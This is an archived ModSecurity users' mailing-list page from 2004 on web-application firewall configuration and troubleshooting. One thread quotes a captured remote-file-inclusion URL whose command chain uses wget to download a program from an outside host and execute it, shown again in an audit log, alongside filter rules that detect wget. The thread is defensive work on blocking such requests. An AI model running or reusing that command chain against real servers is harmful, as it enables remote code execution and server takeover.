mod-security-users Mailing List for ModSecurity (Page 582)
Brought to you by:
victorhora,
zimmerletw
You can subscribe to this list here.
| 2003 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
(2) |
Jul
(17) |
Aug
(7) |
Sep
(8) |
Oct
(11) |
Nov
(14) |
Dec
(19) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2004 |
Jan
(46) |
Feb
(14) |
Mar
(20) |
Apr
(48) |
May
(15) |
Jun
(20) |
Jul
(36) |
Aug
(24) |
Sep
(31) |
Oct
(28) |
Nov
(23) |
Dec
(12) |
| 2005 |
Jan
(69) |
Feb
(61) |
Mar
(82) |
Apr
(53) |
May
(26) |
Jun
(71) |
Jul
(27) |
Aug
(52) |
Sep
(28) |
Oct
(49) |
Nov
(104) |
Dec
(74) |
| 2006 |
Jan
(61) |
Feb
(148) |
Mar
(82) |
Apr
(139) |
May
(65) |
Jun
(116) |
Jul
(92) |
Aug
(101) |
Sep
(84) |
Oct
(103) |
Nov
(174) |
Dec
(102) |
| 2007 |
Jan
(166) |
Feb
(161) |
Mar
(181) |
Apr
(152) |
May
(192) |
Jun
(250) |
Jul
(127) |
Aug
(165) |
Sep
(97) |
Oct
(135) |
Nov
(206) |
Dec
(56) |
| 2008 |
Jan
(160) |
Feb
(135) |
Mar
(98) |
Apr
(89) |
May
(115) |
Jun
(95) |
Jul
(188) |
Aug
(167) |
Sep
(153) |
Oct
(84) |
Nov
(82) |
Dec
(85) |
| 2009 |
Jan
(139) |
Feb
(133) |
Mar
(128) |
Apr
(105) |
May
(135) |
Jun
(79) |
Jul
(92) |
Aug
(134) |
Sep
(73) |
Oct
(112) |
Nov
(159) |
Dec
(80) |
| 2010 |
Jan
(100) |
Feb
(116) |
Mar
(130) |
Apr
(59) |
May
(88) |
Jun
(59) |
Jul
(69) |
Aug
(67) |
Sep
(82) |
Oct
(76) |
Nov
(59) |
Dec
(34) |
| 2011 |
Jan
(84) |
Feb
(74) |
Mar
(81) |
Apr
(94) |
May
(188) |
Jun
(72) |
Jul
(118) |
Aug
(109) |
Sep
(111) |
Oct
(80) |
Nov
(51) |
Dec
(44) |
| 2012 |
Jan
(80) |
Feb
(123) |
Mar
(46) |
Apr
(12) |
May
(40) |
Jun
(62) |
Jul
(95) |
Aug
(66) |
Sep
(65) |
Oct
(53) |
Nov
(42) |
Dec
(60) |
| 2013 |
Jan
(96) |
Feb
(96) |
Mar
(108) |
Apr
(72) |
May
(115) |
Jun
(111) |
Jul
(114) |
Aug
(87) |
Sep
(93) |
Oct
(97) |
Nov
(104) |
Dec
(82) |
| 2014 |
Jan
(96) |
Feb
(77) |
Mar
(71) |
Apr
(40) |
May
(48) |
Jun
(78) |
Jul
(54) |
Aug
(44) |
Sep
(58) |
Oct
(79) |
Nov
(51) |
Dec
(52) |
| 2015 |
Jan
(55) |
Feb
(59) |
Mar
(48) |
Apr
(40) |
May
(45) |
Jun
(63) |
Jul
(36) |
Aug
(49) |
Sep
(35) |
Oct
(58) |
Nov
(21) |
Dec
(47) |
| 2016 |
Jan
(35) |
Feb
(81) |
Mar
(43) |
Apr
(41) |
May
(77) |
Jun
(52) |
Jul
(39) |
Aug
(34) |
Sep
(107) |
Oct
(67) |
Nov
(54) |
Dec
(20) |
| 2017 |
Jan
(99) |
Feb
(37) |
Mar
(86) |
Apr
(47) |
May
(57) |
Jun
(55) |
Jul
(34) |
Aug
(31) |
Sep
(16) |
Oct
(49) |
Nov
(53) |
Dec
(33) |
| 2018 |
Jan
(25) |
Feb
(11) |
Mar
(79) |
Apr
(77) |
May
(5) |
Jun
(19) |
Jul
(17) |
Aug
(7) |
Sep
(13) |
Oct
(22) |
Nov
(13) |
Dec
(68) |
| 2019 |
Jan
(44) |
Feb
(17) |
Mar
(40) |
Apr
(39) |
May
(18) |
Jun
(14) |
Jul
(20) |
Aug
(31) |
Sep
(11) |
Oct
(35) |
Nov
(3) |
Dec
(10) |
| 2020 |
Jan
(32) |
Feb
(16) |
Mar
(10) |
Apr
(22) |
May
(2) |
Jun
(34) |
Jul
(1) |
Aug
(8) |
Sep
(36) |
Oct
(16) |
Nov
(13) |
Dec
(10) |
| 2021 |
Jan
(16) |
Feb
(23) |
Mar
(45) |
Apr
(28) |
May
(6) |
Jun
(17) |
Jul
(8) |
Aug
(1) |
Sep
(2) |
Oct
(35) |
Nov
|
Dec
(5) |
| 2022 |
Jan
|
Feb
(17) |
Mar
(23) |
Apr
(23) |
May
(9) |
Jun
(8) |
Jul
|
Aug
|
Sep
(7) |
Oct
(5) |
Nov
(16) |
Dec
(4) |
| 2023 |
Jan
|
Feb
|
Mar
(3) |
Apr
|
May
(1) |
Jun
(4) |
Jul
(1) |
Aug
|
Sep
(2) |
Oct
(1) |
Nov
|
Dec
|
| 2024 |
Jan
(7) |
Feb
(13) |
Mar
(18) |
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(2) |
Oct
(1) |
Nov
(5) |
Dec
(3) |
| 2025 |
Jan
|
Feb
|
Mar
|
Apr
(12) |
May
(12) |
Jun
(2) |
Jul
(3) |
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: <deb...@sp...> - 2004-03-18 16:24:48
|
I am trying to spec out a system to runs as a modsec appliance providing IDS /IPS to multiple IIS websites some very heavily used Can anyone thing be figures on process load, memory usage of modsecurity? Do people recommend apache 1.3 or 2 if 2 prefork variable or other? thanks Mat |
|
From: <iv...@we...> - 2004-03-03 11:21:12
|
> I have a problem with filtering the http-request TRACE. The HEAD and OPTIONS request is > filtered correctly, but it is not possible to filter TRACE requests. Is an error in my > config file or is it not possible to filter TRACE? It isn't possible at the moment. Apache handles TRACE before the request reaches mod_security. That could possibly change in a future release, but in the meantime you can use mod_rewrite to filter out TRACE. Bye, Ivan |
|
From: Jochen B. <jo...@ro...> - 2004-03-02 14:21:39
|
Hi! I have a problem with filtering the http-request TRACE. The HEAD and OPTIONS request is filtered correctly, but it is not possible to filter TRACE requests. Is an error in my config file or is it not possible to filter TRACE? best regards, Jochen My setup: Debian GNU/Linux unstable Apache 1.3.29 Mod-Security 1.7.5 but was also tested with: Debian GNU/Linux stable Apache 1.3.26 Mod-Security 1.7.1 SecFilterEngine On =20 SecFilterInheritance On SecFilterScanPOST on SecFilterCheckURLEncoding On SecFilterCheckUnicodeEncoding On SecFilterForceByteRange 0 255 SecFilterDebugLog /var/log/apache/modsec_debug_log SecFilterDebugLevel 3 SecAuditEngine On SecAuditLog /var/log/apache/modsec_audit_log SecFilterDefaultAction "deny,log,status:500" SecFilter hidden SecFilterSelective "REQUEST_METHOD" ^OPTIONS SecFilterSelective "REQUEST_METHOD" ^TRACE SecFilterSelective "REQUEST_METHOD" ^HEAD |
|
From: Sebastian W. <seb...@wo...> - 2004-03-02 00:48:34
|
=2D----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I am the author of the book "Apache Webserver 2 - Installation, Konfigurati= on,=20 Programmierung" (Apache Webserver 2 - installation, configuration,=20 programming) which will be released by Addison & Wesley in the=20 German-speaking area by the end of this month (2nd revised edition).=20 As I said to Ivan some time ago I wrote a chapter on mod_security (~30 page= s)=20 which will be included in my book (in German, sorry!) and which contains an= =20 in-depth description of mod_security as well as all the features provided b= y=20 this module (including building chroot environments etc.). I hope you guys= =20 will like it and I also would like to thank Ivan Ristic for developing this= =20 awesome module and giving me help on writing that chapter. Bye, Sebastian =20 =2D----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAQ9cad8QFWG1Rza8RAg5BAKCTyHcyCxb1ouGJPBS8I/d/wv2nXQCeNKZq YnBE4De3hzl2ClBKKjOQevA=3D =3D0guq =2D----END PGP SIGNATURE----- |
|
From: Jim H. <jim...@rc...> - 2004-03-02 00:31:12
|
Ivan, Thank you very much, I thought that might be the case. I am not a html programmer, I just wanted to stress test mod_security. The tool is just excellent, I threw everything Nessus could throw at it, and mod_security handled it great. Regards, Jim -----Original Message----- From: iv...@we... [mailto:iv...@we...]=20 Sent: Monday, March 01, 2004 4:56 AM To: me...@op... Cc: jim...@rc...; mod...@li... Subject: Re: [mod-security-users] Rule testing question >> test for Apache (what I'm running). On a few test I am receiving 500 series errors >> (configuration error) saying 200 is required. I saw Ivan mention = this in some of the >> scripts. Can anybody point me to where I can find what 200 is? I = have been googling for >> 90 minutes and haven't stumbled upon it. > > http://www.rfc-editor.org/rfc/rfc2616.txt > > 200 =3D OK =3D The HTTP request went fine. > > I don't know the answer to the deeper question > though (getting 500 when you should get 200). Regression tests are crafted for the Apache configuration that's in the root of the distribution. So getting the HTTP status 500 where I expect 200 probably means that you have a more restrictive configuration. Since your configuration is different, the best approach would be to write your own regression tests using the existing tests as examples. Bye, Ivan |
|
From: <iv...@we...> - 2004-03-01 10:08:17
|
>> test for Apache (what I'm running). On a few test I am receiving 500 series errors >> (configuration error) saying 200 is required. I saw Ivan mention this in some of the >> scripts. Can anybody point me to where I can find what 200 is? I have been googling for >> 90 minutes and haven't stumbled upon it. > > http://www.rfc-editor.org/rfc/rfc2616.txt > > 200 = OK = The HTTP request went fine. > > I don't know the answer to the deeper question > though (getting 500 when you should get 200). Regression tests are crafted for the Apache configuration that's in the root of the distribution. So getting the HTTP status 500 where I expect 200 probably means that you have a more restrictive configuration. Since your configuration is different, the best approach would be to write your own regression tests using the existing tests as examples. Bye, Ivan |
|
From: Ulf H. <me...@op...> - 2004-02-29 23:57:27
|
> test for Apache (what I'm running). On a few test I am receiving 500 series > errors (configuration error) saying 200 is required. I saw Ivan mention > this in some of the scripts. Can anybody point me to where I can find what > 200 is? I have been googling for 90 minutes and haven't stumbled upon it. http://www.rfc-editor.org/rfc/rfc2616.txt 200 = OK = The HTTP request went fine. I don't know the answer to the deeper question though (getting 500 when you should get 200). // Ulf Harnhammar kses - PHP HTML/XHTML filter (no XSS) http://sourceforge.net/projects/kses -- _____________________________________________________________ Web-based SMS services available at http://www.operamail.com. From your mailbox to local or overseas cell phones. Powered by Outblaze |
|
From: Jim H. <jim...@rc...> - 2004-02-29 22:31:19
|
My rule testing is going thanks to Jochen's tip. I am now having = another problem, I followed the documentation copy files and adding the = regression test for Apache (what I'm running). On a few test I am receiving 500 = series errors (configuration error) saying 200 is required. I saw Ivan mention this in some of the scripts. Can anybody point me to where I can find = what 200 is? I have been googling for 90 minutes and haven't stumbled upon = it. Thanks in advance, Jim |
|
From: Ulf H. <me...@op...> - 2004-02-29 15:26:08
|
Hello, I have an article on mod_security in the latest issue of the Swedish computer magazine Nätmagazin ( http://www.natmagazin.se/ ). I'll make it available online when the next issue reaches the shops. // Ulf -- _____________________________________________________________ Web-based SMS services available at http://www.operamail.com. From your mailbox to local or overseas cell phones. Powered by Outblaze |
|
From: Jochen B. <jo...@ro...> - 2004-02-29 01:00:47
|
Hi! You can find run-test.pl in the tests directory of the mod-security tarball. The tests directory also contains about 57 example attacks you can use with run-test.pl. best regards, Jochen > All, >=20 > Are there scripts available anywhere to test the basic rule sets of > mod_security? I used an aggressive Nessus test against my mod_security > installation and it came through fine. I was hoping there is a repositor= y > of scripts to validate/verify my installation. >=20 > TIA. > Regards, > Jim >=20 >=20 >=20 >=20 > ------------------------------------------------------- > SF.Net is sponsored by: Speed Start Your Linux Apps Now. > Build and deploy apps & Web services for Linux with > a free DVD software kit from IBM. Click Now! > http://ads.osdn.com/?ad_id=3D1356&alloc_id=3D3438&op=3Dclick > _______________________________________________ > mod-security-users mailing list > mod...@li... > https://lists.sourceforge.net/lists/listinfo/mod-security-users |
|
From: Jim H. <jim...@rc...> - 2004-02-29 00:46:37
|
All, Are there scripts available anywhere to test the basic rule sets of mod_security? I used an aggressive Nessus test against my mod_security installation and it came through fine. I was hoping there is a repository of scripts to validate/verify my installation. TIA. Regards, Jim |
|
From: Ivan R. <iv...@we...> - 2004-02-16 12:10:47
|
ta....@li... wrote: > hello > > ma question is if there isnt a server-signature entry for mod_security > normally a loaded module shows in the server signature > i dont have secserversignature turned on - so i think it should show its version etc > i tried secserversignature and it workes fine ... but for me it is not a sec reasen to show my servers version > i`m using apache2.X on windows > running as https://erp01.svap.org If I understand you correctly, you want mod_security to appear in your server signature? If so, add this to your configuration file: SecServerResponseToken On But that's not a very good idea. You are giving the attacker more information, data he can use to attack you. -- ModSecurity (http://www.modsecurity.org) [ Open source IDS for Web applications ] |
|
From: <ta....@li...> - 2004-02-14 09:22:23
|
hello ma question is if there isnt a server-signature entry for mod_security normally a loaded module shows in the server signature i dont have secserversignature turned on - so i think it should show its version etc i tried secserversignature and it workes fine ... but for me it is not a sec reasen to show my servers version i`m using apache2.X on windows running as https://erp01.svap.org maybe somebody can help me erp |
|
From: Ivan R. <iv...@we...> - 2004-02-05 20:59:03
|
> SecFilterSelective THE_REQUEST "/_vti_bin/_vti_aut/author\.exe" log,pass > > That I am trying to push frontpage through. However, it is neither logging, > nor passing the request. It works for me. Perhaps you have another rule that blocks the request first. You can see these things in the debug log. Also, are you looking for a message in the error log? -- ModSecurity (http://www.modsecurity.org) [ Open source IDS for Web applications ] |
|
From: Danny S. <dsh...@al...> - 2004-02-05 20:49:00
|
I have this rule SecFilterSelective THE_REQUEST "/_vti_bin/_vti_aut/author\.exe" log,pass That I am trying to push frontpage through. However, it is neither logging, nor passing the request. |
|
From: Ivan R. <iv...@we...> - 2004-02-04 20:28:47
|
Danny Shurett wrote: > I am working on getting my filters configured for a number of webservers. I > used a few filters I found in the snort filters that were converted. > However, upon further investigation, it didn't yield what I was looking for. > Here is the one I think should be tripped: > > # WEB-ATTACKS wget command attempt > SecFilter "wget\x20" It seems that the filter works fine in Apache 2, but not in Apache 1. The problem is with the escaping syntax; if you replace "\x20" with a simple space it works fine. Behaviors are probably different because two servers use two different regex engines (Apache 1 using something called hsregex, and Apache 2 using http://www.pcre.org). However, looking at the Apache web site, the \xHH syntax should work with Apache 1.x too. I'll try to find some documentation on the subject, or, if I fail, try to work around the problem in mod_security. Thanks for your email. -- ModSecurity (http://www.modsecurity.org) [ Open source IDS for Web applications ] |
|
From: Danny S. <dsh...@al...> - 2004-02-04 20:03:23
|
Yes, SecFilters are working. If I append a /bin/ps error on the end of it, I get an error. Log file is also being written to. On 2/4/04 2:53 PM, "L. Christopher Luther" <CL...@Xy...> wrote: > Do any of the other SecFilter filters work? And a silly question, is your > filtering actually turned on (SecFilterEngine On)? > > When I use the URL against one of my internal web servers (Apache Linux), I > receive the following error: > >>>>>>>>>>> > Internal Server Error > The server encountered an internal error or misconfiguration and was unable > to complete your request. > > Please contact the server administrator, xs...@xy... and inform > them of the time the error occurred, and anything you might have done that > may have caused the error. > > More information about this error may be available in the server error log. > <<<<<<<<<< > > And when I check the logs, I see the following (IP addresses and names > obfuscated): > >>>>>>>>>>> > ======================================== > Request: x.x.x.x - - [[04/Feb/2004:14:48:25 --0500]] "GET > /?basepath=http://w > ww.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.trip > od.c > om.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541 > Handler: (null) > ---------------------------------------- > GET > /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget% > 20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/vnd.ms- > excel, application/msword, application/x-shockwave-flash, */* > Accept-Language: en-us > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; > brip1; . > NET CLR 1.1.4322) > Host: mysecret > Connection: Keep-Alive > mod_security-message: Access denied with code 500. Pattern match "wget\x20" > at T > HE_REQUEST. > mod_security-action: 500 > > HTTP/1.1 500 Internal Server Error > Content-Length: 541 > Connection: close > Content-Type: text/html; charset=iso-8859-1 > <<<<<<<<<< > > So it appears that my 'SecFilter "wget\x20"' is working. > > > - Christopher > > > -----Original Message----- > From: Danny Shurett [mailto:dsh...@al...] > Sent: Wednesday, February 04, 2004 2:20 PM > To: mod...@li... > Subject: [mod-security-users] Problem with snort rules > > > I am working on getting my filters configured for a number of webservers. I > used a few filters I found in the snort filters that were converted. > However, upon further investigation, it didn't yield what I was looking for. > Here is the one I think should be tripped: > > # WEB-ATTACKS wget command attempt > SecFilter "wget\x20" > > Here is a real url (slightly modified) that was used to attack a server. > > > http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?& > cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi > > > > I would have expected the wget filter above to block it. Can anyone help > me understand why the filter above doesn't block wget? Am I missing the > point? Please be gentle. Thanks. > > > > ------------------------------------------------------- > The SF.Net email is sponsored by EclipseCon 2004 > Premiere Conference on Open Tools Development and Integration > See the breadth of Eclipse activity. February 3-5 in Anaheim, CA. > http://www.eclipsecon.org/osdn > _______________________________________________ > mod-security-users mailing list > mod...@li... > https://lists.sourceforge.net/lists/listinfo/mod-security-users > > |
|
From: L. C. L. <CL...@Xy...> - 2004-02-04 19:53:41
|
Do any of the other SecFilter filters work? And a silly question, is your filtering actually turned on (SecFilterEngine On)? When I use the URL against one of my internal web servers (Apache Linux), I receive the following error: >>>>>>>>>> Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, xs...@xy... and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. <<<<<<<<<< And when I check the logs, I see the following (IP addresses and names obfuscated): >>>>>>>>>> ======================================== Request: x.x.x.x - - [[04/Feb/2004:14:48:25 --0500]] "GET /?basepath=http://w ww.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.trip od.c om.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541 Handler: (null) ---------------------------------------- GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget% 20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms- excel, application/msword, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; brip1; . NET CLR 1.1.4322) Host: mysecret Connection: Keep-Alive mod_security-message: Access denied with code 500. Pattern match "wget\x20" at T HE_REQUEST. mod_security-action: 500 HTTP/1.1 500 Internal Server Error Content-Length: 541 Connection: close Content-Type: text/html; charset=iso-8859-1 <<<<<<<<<< So it appears that my 'SecFilter "wget\x20"' is working. - Christopher -----Original Message----- From: Danny Shurett [mailto:dsh...@al...] Sent: Wednesday, February 04, 2004 2:20 PM To: mod...@li... Subject: [mod-security-users] Problem with snort rules I am working on getting my filters configured for a number of webservers. I used a few filters I found in the snort filters that were converted. However, upon further investigation, it didn't yield what I was looking for. Here is the one I think should be tripped: # WEB-ATTACKS wget command attempt SecFilter "wget\x20" Here is a real url (slightly modified) that was used to attack a server. http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?& cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi I would have expected the wget filter above to block it. Can anyone help me understand why the filter above doesn't block wget? Am I missing the point? Please be gentle. Thanks. ------------------------------------------------------- The SF.Net email is sponsored by EclipseCon 2004 Premiere Conference on Open Tools Development and Integration See the breadth of Eclipse activity. February 3-5 in Anaheim, CA. http://www.eclipsecon.org/osdn _______________________________________________ mod-security-users mailing list mod...@li... https://lists.sourceforge.net/lists/listinfo/mod-security-users |
|
From: Danny S. <dsh...@al...> - 2004-02-04 19:19:45
|
I am working on getting my filters configured for a number of webservers. I used a few filters I found in the snort filters that were converted. However, upon further investigation, it didn't yield what I was looking for. Here is the one I think should be tripped: # WEB-ATTACKS wget command attempt SecFilter "wget\x20" Here is a real url (slightly modified) that was used to attack a server. http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?& cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi I would have expected the wget filter above to block it. Can anyone help me understand why the filter above doesn't block wget? Am I missing the point? Please be gentle. Thanks. |
|
From: Ivan R. <iv...@we...> - 2004-02-01 23:22:45
|
noraan for hosting and design wrote: > Hello > when > SecFilterScanPOST On > > No body can upload the new setting to his forum > > so any idea to resolve it without turn SecFilterScanPOST Off ??? Sure, remove the rules/configuration causing the problem. If you don't understand how mod_security is helping you then chances are that it isn't helping you at all. I recommend that you read the reference manual, start with minimal configuration and work your way up until you get the tightest configuration that still works for your users. -- ModSecurity (http://www.modsecurity.org) [ Open source IDS for Web applications ] |
|
From: Carpenter, S. (OCTO) <Sco...@dc...> - 2004-01-31 05:07:39
|
After much trail and error, I finally figured out to leave off the
http://test/test/com <http://test/test/com> and only use the URI portion.
SecFilter "!testpage/[0-9]{6}/test\.jpg\?[0-1]\.[0-9]{1,20}"
Works fine.
> -----Original Message-----
> From: Carpenter, Scott (OCTO)
> Sent: Wednesday, January 28, 2004 5:56 PM
> To: 'mod...@li...'
> Subject: Regex Problem
>
> I am trying to create at SecFilter rule:
>
> SecFilter
> "!(http://test\.test\.com/testpage/[0-9]{6}/test\.jpg\?[0-1]\.[0-9]{1,20}
> <http://test\.test\.com/testpage/[0-9]{6}/test\.jpg\?[0-1]\.[0-9]{1,20}>
> )"
>
>
> To stop any but url's like:
>
> http://test.test.com/testpage/200011/test.jpg?0.12679403621457513
> <http://test.test.com/testpage/200011/test.jpg?0.12679403621457513>
> http://test.test.com/testpage/200015/test.jpg?0.7822027277630665
> <http://test.test.com/testpage/200015/test.jpg?0.7822027277630665>
> http://test.test.com/testpage200032/test.jpg?0.21133485109517996
> <http://test.test.com/testpage200032/test.jpg?0.21133485109517996>
>
> My regex is working with three different regex testing tools. Am I just
> brain dead, or did I miss something?
>
> Initial
> Secfilter "!testpage"
> Secfilter "!jpg"
>
> Produced the expected results, but I want to tighten it down as much as
> possible.
>
>
> Thanks,
>
> Scott Carpenter
> DCERT Engineer
> City Wide Information Technology Security (CWITS)
> 222 Massachusetts Ave. N.W.
> Brock Annex
> Washington, DC 20001
> (202) 727-8784- voice
> (703) 395-0302 - cell
> sco...@dc...
>
>
|
|
From: noraan f. h. a. d. <maz...@ho...> - 2004-01-30 21:57:37
|
Hello when SecFilterScanPOST On No body can upload the new setting to his forum so any idea to resolve it without turn SecFilterScanPOST Off ??? |
|
From: Ivan R. <iv...@we...> - 2004-01-30 21:11:08
|
> 1. Is it (will it be) possible to have a couple of > SecFilterForceByteRange statements? For p.e. german > sites you have to allow almost the complete range > (the lower one for web forms - tab, crlf, etc and > the higher one for the special characs)? At the > moment, I have to use a lot of SecFilterSelective > statements instead. It will be. I have that planned for (goes away and looks at the plan) 1.9 dev, which should be available in about a month. > 2. Do I need certain apache modules for some > functions to work? Even with No. > SecFilterOutputMimeTypes "(null) text/html text/plain" > all my OUTPUT filters do not work any more. When > uncommenting this one, they work fine. Send me your httpd.conf, a fragment of your mod_security debug log (set level to 9 first) and of the audit log (only for one request where you expect output scanning to work and it doesn't). > I also have a > problem with the SecServerSignature statement, both > the proxy and the real servers have ServerTokens full > but the server distribution is not masked. The debug log should help here too. > I am currently using apache 2.0.48 compiled on my > OpenBSD 3.4 x86 machine, running in systrace jail. And which version of mod_security? :) -- ModSecurity (http://www.modsecurity.org) [ Open source IDS for Web applications ] |
|
From: Carpenter, S. (OCTO) <Sco...@dc...> - 2004-01-30 05:13:12
|
I am trying to create at SecFilter rule:
SecFilter
"!(http://test\.test\.com/testpage/[0-9]{6}/test\.jpg\?[0-1]\.[0-9]{1,20}
<http://test\.test\.com/testpage/[0-9]{6}/test\.jpg\?[0-1]\.[0-9]{1,20}> )"
To stop any but url's like:
http://test.test.com/testpage/200011/test.jpg?0.12679403621457513
<http://test.test.com/testpage/200011/test.jpg?0.12679403621457513>
http://test.test.com/testpage/200015/test.jpg?0.7822027277630665
<http://test.test.com/testpage/200015/test.jpg?0.7822027277630665>
http://test.test.com/testpage200032/test.jpg?0.21133485109517996
<http://test.test.com/testpage200032/test.jpg?0.21133485109517996>
My regex is working with three different regex testing tools. Am I just
brain dead, or did I miss something?
Initial
Secfilter "!testpage"
Secfilter "!jpg"
Produced the expected results, but I want to tighten it down as much as
possible.
Thanks,
Scott Carpenter
DCERT Engineer
City Wide Information Technology Security (CWITS)
222 Massachusetts Ave. N.W.
Brock Annex
Washington, DC 20001
(202) 727-8784- voice
(703) 395-0302 - cell
sco...@dc...
|
|
From: L. C. L. <CL...@Xy...> - 2004-01-28 19:23:31
|
In answer to (1): The problem is that the MySQL library functions in PHP are configured to connect to "localhost", which means using the socket file created by the local MySQL process. And since the socket file is outside of the SecChrootDir "jail", it cannot be "seen" by the PHP code. I too has this problem when I used SecChrootDir, and all I needed to do was configure the PHP code on my Apache server to use "127.0.0.1" instead of "localhost", which forces the PHP MySQL libraries to use TCP instead of the local socket file. I also had to tweak the MySQL user accounts to accept connections from "us...@lo...", which is the name that the 127.0.0.1 IP address resolves to. HTH! - Christopher -----Original Message----- From: Bart [mailto:ba...@so...] Sent: Monday, January 26, 2004 2:52 AM To: mod...@li... Subject: [mod-security-users] chroot and other problems 1. I chrooted apache in standard way. There was no problem. Then I used mod_security to chroot "normal" apache I set in httpd.conf SecChrootDir /chroot/httpd but Apache return error no mysql.sock in /var/lib/mysql/mysql.sock cant write to /tmp/ ... The file mysql.sock exists and /tmp/ has 777 rights. Where is the problem? 2. Can I use mail() php function with mod_security chrooted apache? It was major problem that I decided no tto use chrooted apache 3. Additionaly I would like to test mod_security at all without chroot I added this config to my httpd.conf http://cvs.sourceforge.net/viewcvs.py/*checkout*/mod-security/mod_security/h ttpd.conf.example-full?content-type=text%2Fplain&rev=1.7 After restarting apache I cant logon with my authentication php script. I use session(). How to resolve this. Barti ------------------------------------------------------- The SF.Net email is sponsored by EclipseCon 2004 Premiere Conference on Open Tools Development and Integration See the breadth of Eclipse activity. February 3-5 in Anaheim, CA. http://www.eclipsecon.org/osdn _______________________________________________ mod-security-users mailing list mod...@li... https://lists.sourceforge.net/lists/listinfo/mod-security-users |